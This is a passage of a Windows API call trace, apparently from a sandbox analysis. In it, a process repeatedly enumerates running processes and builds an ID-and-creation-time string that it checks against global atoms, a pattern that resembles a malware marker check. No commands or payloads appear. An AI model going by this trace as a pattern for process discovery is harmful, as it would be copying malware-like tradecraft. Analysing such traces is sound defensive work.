	[0113.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0113.269] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.269] CloseHandle (hObject=0x690) returned 1
	[0113.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0113.269] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.269] CloseHandle (hObject=0x690) returned 1
	[0113.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0113.270] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.270] CloseHandle (hObject=0x690) returned 1
	[0113.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0113.270] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.270] CloseHandle (hObject=0x690) returned 1
	[0113.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0113.270] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.270] CloseHandle (hObject=0x690) returned 1
	[0113.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0113.270] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.270] CloseHandle (hObject=0x690) returned 1
	[0113.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0113.270] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.271] CloseHandle (hObject=0x690) returned 1
	[0113.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0113.271] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.271] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0113.271] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0113.271] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0113.272] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.272] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0113.272] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.272] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0113.272] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0113.272] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0113.272] CloseHandle (hObject=0x690) returned 1
	[0113.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0113.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0113.273] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.273] CloseHandle (hObject=0x690) returned 1
	[0113.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0113.273] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.273] CloseHandle (hObject=0x690) returned 1
	[0113.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x690
	[0113.273] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.273] CloseHandle (hObject=0x690) returned 1
	[0113.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0113.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0113.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0113.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0113.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0113.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0113.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0113.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0113.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0113.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0113.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0113.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0113.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0113.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0113.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0113.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0113.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0113.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0113.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0113.390] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.390] CloseHandle (hObject=0x690) returned 1
	[0113.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0113.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0113.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0113.390] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.390] CloseHandle (hObject=0x690) returned 1
	[0113.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0113.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0113.391] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.391] CloseHandle (hObject=0x690) returned 1
	[0113.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0113.391] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.391] CloseHandle (hObject=0x690) returned 1
	[0113.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0113.391] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.391] CloseHandle (hObject=0x690) returned 1
	[0113.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0113.391] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.391] CloseHandle (hObject=0x690) returned 1
	[0113.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0113.391] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.392] CloseHandle (hObject=0x690) returned 1
	[0113.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0113.392] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.392] CloseHandle (hObject=0x690) returned 1
	[0113.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0113.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0113.392] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.392] CloseHandle (hObject=0x690) returned 1
	[0113.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0113.392] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.392] CloseHandle (hObject=0x690) returned 1
	[0113.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0113.392] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.393] CloseHandle (hObject=0x690) returned 1
	[0113.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0113.393] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.393] CloseHandle (hObject=0x690) returned 1
	[0113.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0113.393] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.393] CloseHandle (hObject=0x690) returned 1
	[0113.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0113.393] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.393] CloseHandle (hObject=0x690) returned 1
	[0113.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0113.393] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.393] CloseHandle (hObject=0x690) returned 1
	[0113.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0113.394] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.394] CloseHandle (hObject=0x690) returned 1
	[0113.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0113.394] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.394] CloseHandle (hObject=0x690) returned 1
	[0113.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0113.395] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.395] CloseHandle (hObject=0x690) returned 1
	[0113.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0113.395] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.395] CloseHandle (hObject=0x690) returned 1
	[0113.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0113.395] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.395] CloseHandle (hObject=0x690) returned 1
	[0113.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0113.395] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.395] CloseHandle (hObject=0x690) returned 1
	[0113.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0113.396] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.396] CloseHandle (hObject=0x690) returned 1
	[0113.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0113.396] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.396] CloseHandle (hObject=0x690) returned 1
	[0113.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0113.396] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.396] CloseHandle (hObject=0x690) returned 1
	[0113.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0113.396] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.396] CloseHandle (hObject=0x690) returned 1
	[0113.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0113.396] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.396] CloseHandle (hObject=0x690) returned 1
	[0113.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0113.397] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.397] CloseHandle (hObject=0x690) returned 1
	[0113.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0113.397] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.397] CloseHandle (hObject=0x690) returned 1
	[0113.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0113.397] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.397] CloseHandle (hObject=0x690) returned 1
	[0113.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0113.397] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.397] CloseHandle (hObject=0x690) returned 1
	[0113.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0113.398] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.398] CloseHandle (hObject=0x690) returned 1
	[0113.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0113.398] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.398] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0113.398] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0113.398] wsprintfA (in: param_1=0x3993d58, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0113.399] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.399] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0113.399] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.399] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0113.399] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0113.399] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0113.400] CloseHandle (hObject=0x690) returned 1
	[0113.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0113.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0113.400] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.400] CloseHandle (hObject=0x690) returned 1
	[0113.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0113.400] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.400] CloseHandle (hObject=0x690) returned 1
	[0113.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x690
	[0113.400] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.400] CloseHandle (hObject=0x690) returned 1
	[0113.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0113.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0113.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0113.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0113.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0113.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0113.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0113.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0113.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0113.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0113.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0113.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0113.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0113.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0113.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0113.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0113.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0113.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0113.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0113.438] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.439] CloseHandle (hObject=0x690) returned 1
	[0113.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0113.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0113.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0113.439] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.439] CloseHandle (hObject=0x690) returned 1
	[0113.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0113.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0113.439] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.439] CloseHandle (hObject=0x690) returned 1
	[0113.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0113.440] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.440] CloseHandle (hObject=0x690) returned 1
	[0113.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0113.440] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.440] CloseHandle (hObject=0x690) returned 1
	[0113.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0113.440] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.440] CloseHandle (hObject=0x690) returned 1
	[0113.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0113.440] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.440] CloseHandle (hObject=0x690) returned 1
	[0113.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0113.440] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.440] CloseHandle (hObject=0x690) returned 1
	[0113.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0113.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0113.441] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.441] CloseHandle (hObject=0x690) returned 1
	[0113.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0113.441] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.441] CloseHandle (hObject=0x690) returned 1
	[0113.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0113.441] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.441] CloseHandle (hObject=0x690) returned 1
	[0113.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0113.441] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.441] CloseHandle (hObject=0x690) returned 1
	[0113.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0113.442] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.442] CloseHandle (hObject=0x690) returned 1
	[0113.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0113.442] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.442] CloseHandle (hObject=0x690) returned 1
	[0113.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0113.442] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.442] CloseHandle (hObject=0x690) returned 1
	[0113.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0113.442] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.442] CloseHandle (hObject=0x690) returned 1
	[0113.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0113.442] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.443] CloseHandle (hObject=0x690) returned 1
	[0113.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0113.443] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.443] CloseHandle (hObject=0x690) returned 1
	[0113.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0113.443] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.443] CloseHandle (hObject=0x690) returned 1
	[0113.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0113.443] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.443] CloseHandle (hObject=0x690) returned 1
	[0113.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0113.443] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.443] CloseHandle (hObject=0x690) returned 1
	[0113.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0113.444] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.444] CloseHandle (hObject=0x690) returned 1
	[0113.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0113.444] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.444] CloseHandle (hObject=0x690) returned 1
	[0113.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0113.444] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.444] CloseHandle (hObject=0x690) returned 1
	[0113.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0113.444] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.444] CloseHandle (hObject=0x690) returned 1
	[0113.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0113.444] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.444] CloseHandle (hObject=0x690) returned 1
	[0113.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0113.445] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.445] CloseHandle (hObject=0x690) returned 1
	[0113.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0113.445] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.445] CloseHandle (hObject=0x690) returned 1
	[0113.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0113.445] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.445] CloseHandle (hObject=0x690) returned 1
	[0113.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0113.445] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.445] CloseHandle (hObject=0x690) returned 1
	[0113.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0113.446] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.446] CloseHandle (hObject=0x690) returned 1
	[0113.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
